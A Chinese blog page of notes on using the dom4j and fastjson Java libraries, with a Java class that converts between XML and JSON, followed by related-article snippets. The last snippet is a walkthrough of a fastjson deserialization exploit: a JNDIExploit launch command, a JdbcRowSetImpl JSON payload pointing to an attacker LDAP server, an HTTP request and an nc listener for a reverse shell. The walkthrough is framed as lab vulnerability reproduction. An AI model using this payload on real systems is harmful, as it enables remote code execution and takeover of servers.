日常总结 -- dom4j & fastjson篇

最新推荐文章于 2023-07-24 08:39:12 发布
原创 最新推荐文章于 2023-07-24 08:39:12 发布 · 500 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#dom4j

本文详细介绍了DOM4J库用于XML文档的创建、解析和操作,包括字符串与文档的互转、节点与属性的管理。同时,深入探讨了FastJSON库在处理JSON数据时的灵活性,涵盖字符串与JSON对象的转换、JSONPath查询等功能,并提供了XML与JSON相互转换的实现方法。

dom4j: 字符串与文档互转; 创建文档、节点、属性;获取节点、属性值;

1. 创建文档Document:
 Document document = DocumentHelper.createDocument();

2.创建根节点:   
Element root=document.addElement("root");

3.创建子节点(并设置文本内容):  
Element book=root.addElement("book")[.setText("100")];

4.添加节点属性:  book.addAttribute("type","science"); 

5.文档转字符串:
String str = document.asXML();

6.字符串转文档:
Document document=DocumentHelper.parseText(str);

7.获取节点:
Document document = DocumentHelper.parseText(str);->
Element root=document.getRootElement(); -- 根节点
Element book=root.element("book"); -- 子节点;

8.获取节点属性值:
String type=book.attributeValue("type");

9.xpath: /DOCUMENT/BODY

List<Element> children = document.selectNodes(xpath);

 

fastjson: 字符串与JSON互转;JSON、JSONObject、JSONArray;

1.简单对象型: String OBJ_STR = "{\"name\":\"lily\",\"age\":12}";

2.简单对象型: String OBJ_STR = "{\"name\":\"lily\",\"age\":12}";

3. 数组类型: String ARRAY_STR = "[{\"name\":\"lily\",\"age\":12},  {\"name\":\"lucy\",\"age\":15}]";

4.复杂格式: String JSON_STR ="{\"course\":{\"name\":\"english\",\"code\":1270},
            \"stu\":[{\"name\":\"lily\",\"age\":12},{\"name\":\"lucy\",\"age\":15}]}";
        JSONObject jsonObject = JSON.parseObject(OBJ_STR);
        JSONArray jsonArray = JSON.parseArray(JARRAY_STR);

5. JSON转字符串: String str = jsonArray.toJSONString();

6.jsonpath: $.message.body

Object result = JSONPath.eval(jsonObject, jsonpath);

 

XML与JSON互转

import com.alibaba.fastjson.JSONArray;
import com.alibaba.fastjson.JSONObject;
import org.dom4j.Document;
import org.dom4j.DocumentHelper;
import org.dom4j.Element;

import java.util.Iterator;
import java.util.List;

public class Json2Xml {

    /**
     * com.alibaba.fastjson.JSONObject 转 org.dom4j.document
     */
    public static Document jsonToXml(JSONObject jsonObject) {
        Document document = DocumentHelper.createDocument();
        Element root;
        Iterator<String> iter = jsonObject.keySet().iterator();
        if (iter.hasNext()) {
            String key = iter.next();
            root = document.addElement(key);
            jsonToElement(jsonObject, root);
        }
        return document;
    }

    /**
     * @param jsonObject
     * @param element
     * @return
     */
    public static Element jsonToElement(JSONObject jsonObject, Element element) {

        Object jsonNode = jsonObject.get(element.getName());
        if (jsonNode instanceof JSONArray) {
            for (JSONObject childrenJson : (List<JSONObject>) jsonNode) {
                addElement(childrenJson, element);
            }
        } else if (jsonNode instanceof JSONObject) {
            JSONObject childrenJson = (JSONObject) jsonNode;
            addElement(childrenJson, element);
        } else {
            // 递归出口
            element.setText(jsonNode.toString());
        }
        return element;
    }

    /**
     * 1.获取childrenJson的key值, 作为children的节点名
     * 2.转换childrenJson的value,将children添加到element(递归)
     *
     * @param childrenJson
     * @param element
     * @return
     */
    private static Element addElement(JSONObject childrenJson, Element element) {
        Iterator<String> iter = childrenJson.keySet().iterator();
        if (iter.hasNext()) {
            String key = iter.next();
            Element children = element.addElement(key);
            jsonToElement(childrenJson, children);
        }
        return element;
    }

    /**
     * org.dom4j.document 转 com.alibaba.fastjson.JSONObject
     *
     * @param document
     * @return
     */
    public JSONObject xmlToJson(Document document) {
        Element root = document.getRootElement(); // 根节点
        List<Element> elements = root.elements();
        JSONObject jsonObject = new JSONObject();
        return (JSONObject) jsonObject.put(root.getName(), this.elementToJson(elements));
    }

    /**
     * 1.参数element集合,遍历得到element
     * 2.获取element子节点集合,
     * 3.子集合>0递归,否则jsonobject.put(node.name, node.text)
     *
     * @param elements
     * @return
     */
    public static JSONObject elementToJson(List<Element> elements) {
        JSONObject jsonObject = new JSONObject();
        for (Element element : elements) {
            List<Element> children = element.elements();
            if (children.size() > 0) {
                jsonObject.put(element.getName(), elementToJson(children));
            } else {
                jsonObject.put(element.getName(), element.getText());
            }
        }
        return jsonObject;
    }

}

 

xml转json(dom4j + fastjson
lanying100的博客
04-23 2586
xml -> dom4j -> element -> fastjson -> JSONObject/JSONArray -> json
XML与JSON-dom4j+Gson+fastjson
drizzletowne的博客
10-21 333
一 XML基础 XML(EXtensible Markup Language) 是一种标记语言,是被设计用来传输存储数据的。 XML详细教程 1. 语法格式 XML文档声明 &lt;?xml version="1.0" encoding="UTF-8"?&gt; 标记 ( 元素 / 标签 / 节点) 所有 XML 元素都须有关闭标签 XML 标签对大小写敏感 XML 必须正确地嵌套(不允许交叉) XML 文档必须有唯
dom4jfastjson基本使用
qq_37746647的博客
08-28 321
pom.xml &lt;dependencies&gt; &lt;!--lombok--&gt; &lt;dependency&gt; &lt;groupId&gt;org.projectlombok&lt;/groupId&gt; &lt;artifactId&gt;lombok&lt;/artifactId&gt; &l...
Dom4j转Json(fastjson,dom4j)本来想在网上抄点代码,结果都发现既麻烦又基本都是把子节点丢失了,或者子节点变成父节点,只能自己实现了。
XiChengBoJue的博客
09-24 458
private JSONObject xmlToJson(Element rootele, JSONObject jsonobj) { List&lt;Element&gt; subele = rootele.elements(); if (subele.size() == 0){ jsonobj.put(rootele.getName(),rootele.getTextTrim()); return jsonobj; }else{ .
xml转json     依赖于dom4jfastjson
tcc_project的博客
08-13 1840
https://www.cnblogs.com/hmpcly/p/9674802.html xml转json 依赖于dom4jfastjson
httpclient-4.4.jar mysql-connector-java-5.0.8-bin.jar等等
09-15
10. **commons-httpclient-3.1.jar**:这是Apache Commons HttpClient库的一个旧版本,同样用于HTTP通信,与HttpClient-4.x相比,功能相对简单,但在某些老项目中仍有应用。 11. **fastjson-1.1.8.jar**:FastJSON...
Java基础总结
qq_43573663的博客
11-17 887
文章目录关于变量声明"=="equals方法究竟有什么区别?String到底变了没有?final关键字修饰instanceof 关于变量声明 String str = "Hello!";    通常认识为: 一个String,内容是“Hello!”,然而这样模糊的回答通常是概念不清的根源。 准确的回答: 一个指向对象的引用,名为“str”,可以指向类型为String的任何对象,目前指向"Hello!"这个String类型的对象。 我们并没有声明一个String对象,我们只是声明了一个只能指向String
Tools:常用工具类
03-12
7. **Logging Frameworks**: Java中常见的日志工具类有Log4j、SLF4J、Logback等,它们提供灵活的日志记录配置,便于调试问题追踪。 8. **JSON处理**: 如Gson、Jackson、Fastjson等库,用于将Java对象转换为JSON...
Java开发常用数据包汇总
此外,还可能包含**单元测试框架**(JUnit、TestNG)、**加密解密工具**(Bouncy Castle)、**时间处理库**(Joda-Time,适用于Java 8之前的版本)以及**XML解析器**(DOM4J、Xerces)等辅助性但极为重要的组件。...
50个左右的JAVA工具类,相对比较全
11-30
12. **日志记录工具类**:如Log4j、SLF4J、Java Util Logging等,提供灵活的日志记录方案。 这些工具类大大提升了代码的可读性可维护性,减少了重复代码,提高了开发效率。在实际项目中,根据具体需求选择合适的...
fastjson的jar包,包含api文档
08-18
Fastjson是一个Java语言编写的高性能功能完善的JSON库。 高性能: fastjson采用独创的算法,将parse的速度提升到极致,超过所有json库,包括曾经号称最快的jackson。并且还超越了google的二进制协议protocol buf。 支持标准: Fastjson完全支持http://json.org的标准,也是官方网站收录的参考实现之一。 功能强大: 支持各种JDK类型。包括基本类型、JavaBean、Collection、Map、Enum、泛型等。 支持循环引用 无依赖 不需要例外额外的jar,能够直接跑在JDK上。 支持范围广 支持JDK 5、JDK 6、Android、阿里云手机等环境。 开源 Apache License 2.0 代码托管在github.org上,项目地址是 https://github.com/AlibabaTech/fastjson 测试充分 fastjson有超过1500个testcase,每次构建都会跑一遍,丰富的测试场景保证了功能稳定。
通过fastjson实现各种格式与json之间的转换
03-22
通过fastjson实现了JavaBean,list,MAP,list等格式与json格式之间的转换,已经附带fastjson的包,包的版本为fastjson-1.1.36.jar
dom4j解析数组类型XML
caizi1288的专栏
11-28 1615
很久没写文章了,虽然这段时间接触了一些新的技术,之前也有了解过,但一直没有在实际项目开发中使用过,比如系统之间交互经常使用的WebServiceJMS技术。根据甲方项目规划,如果系统之间交互的数据量比较大的话,首先采用JMS方式来发送接收数据,数据内容主要以XML格式为主,各项目组自行约定适合不同业务的XML文档格式。 当系统接收到新的请求,就需要开始解析此消息XML内容。XML内容...
使用Dom4j
weixin_39816332的博客
09-05 317
package cn.juni.test; import java.io.File; import java.io.FileOutputStream; import java.io.FileWriter; import java.io.IOException; import java.util.HashMap; import java.util.Iterator; import java.u...
Dom4j的简单使用(笔记)
weixin_46949627的博客
04-01 693
Dom4j的简单笔记
Dom4J解析xml文件
大学生小汪的成长博客
07-07 704
(一)xml基础简介: 什么是xml? -可扩展标记语言,根据自己的需求定义自己的标签。 xml文件的作用: -主要用来传输存储数据。 解析xml文件的方法: -DOM、DOM4J、SAX -DOM与DOM4J:基于树结构的解析(一次性读取到内存中需要什么解析什么)。注:DOM复杂繁琐,DOM4J对DOM进行了封装,建议使用DOM4J-SAX:基于事件流的解析(边读边解析,不回头),适...
JsonPath | FastJson的JSONPath使用
Sunny的专栏
06-15 5338
一. 简介 JSONPath - 用于JSON的XPath 用来解析多层嵌套的json数据;JsonPath 是一种信息抽取类库,是从JSON文档中抽取指定信息的工具. JsonPath有许多编程语言,如Javascript、Python、PHP、Java等 JsonPath提供的json解析非常强大,它提供了类似正则表达式的语法,基本上可以满足所有你想要获得的json内容。 JSONPathGitHub:https://github.com/json-path/JsonPath ...
FastJson 解析神器JsonPath 使用手册
独泪了无痕
07-24 7553
正如XPath对XML的解析一样,JSONPath的定义是基于fastjson的json路径解析,对JSON文档的一种解析工具。通过JSONPath可以轻松的对JSON文档获取指定“路径”的数据,在非常复杂的json结构中,对于一些获取判断操作,不需要层层的去get,可以通过简洁的JsonPath表达式精准找到需要的部分。
Java基础编程2—利用bootstraphighcharts制作图表(柱状图)
SURLIYA的博客
05-26 3364
开发环境:eclipse MRS.2;数据库:MySQL5;jar包:gson-2.2.2.jar,mysql-connector-java-5.1.37-bin.jar;css文件:bootstrap-theme.css.map,bootstrap-theme.min.css,bootstrap.min.css;js文件:jquery-2.2.3.min.js,bootstrap.min.js,...
使用JNDIExploit-1.2-SNAPSHOT.jar复现fastjson
最新发布
08-06
使用 `JNDIExploit-1.2-SNAPSHOT.jar` 工具复现 Fastjson 漏洞的过程,主要涉及以下几个步骤,适用于安全研究人员在可控环境中进行漏洞验证测试。Fastjson 是阿里巴巴开源的一个 JSON 解析库,因其自动反序列化功能而存在反序列化漏洞(如 CVE-2017-18349、CVE-2022-25647 等),攻击者可通过构造恶意 JSON 数据触发远程代码执行。 ### 漏洞复现环境准备 #### 1. 环境搭建 - **目标机器(受害机)**:运行 Fastjson 存在漏洞版本的 Web 应用。 - **攻击机(渗透测试机)**:安装 Java 环境、`JNDIExploit-1.2-SNAPSHOT.jar`、`nc`、`Burp Suite` 等工具。 - **网络配置**:确保攻击机与目标机处于同一局域网内,以便 JNDI 回连。 #### 2. 启动 JNDIExploit 执行如下命令启动 LDAP/RMI 服务,监听指定 IP 端口: ```bash java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.200.128 ``` 该命令将启动 LDAP 服务,默认监听 1389 端口,用于触发目标机器的 JNDI 注入攻击。 ### Fastjson 漏洞利用流程 #### 3. 构造恶意 JSON 数据 Fastjson 的反序列化漏洞通常出现在 `parseObject` 或 `parse` 方法中。构造如下恶意 JSON 数据,利用 `autoType` 功能加载远程恶意类: ```json { &quot;a&quot;: { &quot;@type&quot;: &quot;java.lang.Class&quot;, &quot;val&quot;: &quot;com.sun.rowset.JdbcRowSetImpl&quot; }, &quot;b&quot;: { &quot;@type&quot;: &quot;com.sun.rowset.JdbcRowSetImpl&quot;, &quot;dataSourceName&quot;: &quot;ldap://192.168.200.128:1389/Basic/ReverseShell/192.168.200.128/6666&quot;, &quot;autoCommit&quot;: true } } ``` 该 JSON 利用 `JdbcRowSetImpl` 类触发 JNDI 注入,加载远程 LDAP 服务中的恶意类,进而执行反弹 Shell 操作。 #### 4. 发送请求并触发漏洞 使用 `Burp Suite` 或其他 HTTP 客户端工具,将上述 JSON 数据作为请求体发送至存在 Fastjson 漏洞的目标接口。例如,目标接口为: ``` POST /vulnerable-endpoint HTTP/1.1 Host: 192.168.200.132:8080 Content-Type: application/json {&quot;a&quot;:{&quot;@type&quot;:&quot;java.lang.Class&quot;,&quot;val&quot;:&quot;com.sun.rowset.JdbcRowSetImpl&quot;},&quot;b&quot;:{&quot;@type&quot;:&quot;com.sun.rowset.JdbcRowSetImpl&quot;,&quot;dataSourceName&quot;:&quot;ldap://192.168.200.128:1389/Basic/ReverseShell/192.168.200.128/6666&quot;,&quot;autoCommit&quot;:true}} ``` #### 5. 反弹 Shell 获取控制权限 在攻击机上启动 `nc` 监听器,等待目标机器反弹 Shell: ```bash nc -lvvp 6666 ``` 当目标应用解析恶意 JSON 并触发 JNDI 注入时,将从攻击机加载恶意类并执行反弹 Shell 命令,成功获取目标机器的命令执行权限。 ### 注意事项 - **Fastjson 版本影响**:确保目标应用使用的 Fastjson 版本存在漏洞(如 1.2.24 及以下),高版本已修复相关问题。 - **autoType 开启**:Fastjson 默认关闭 `autoType` 功能,若目标应用未启用该功能,则无法触发反序列化漏洞。 - **JNDIExploit 使用限制**:不同版本的 `JNDIExploit` 支持的攻击载荷不同,建议使用 1.2 或 1.4 版本以兼容性更强。 - **防火墙与端口开放**:确保攻击机的 1389(LDAP) 6666(反弹 Shell)端口未被防火墙阻止。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值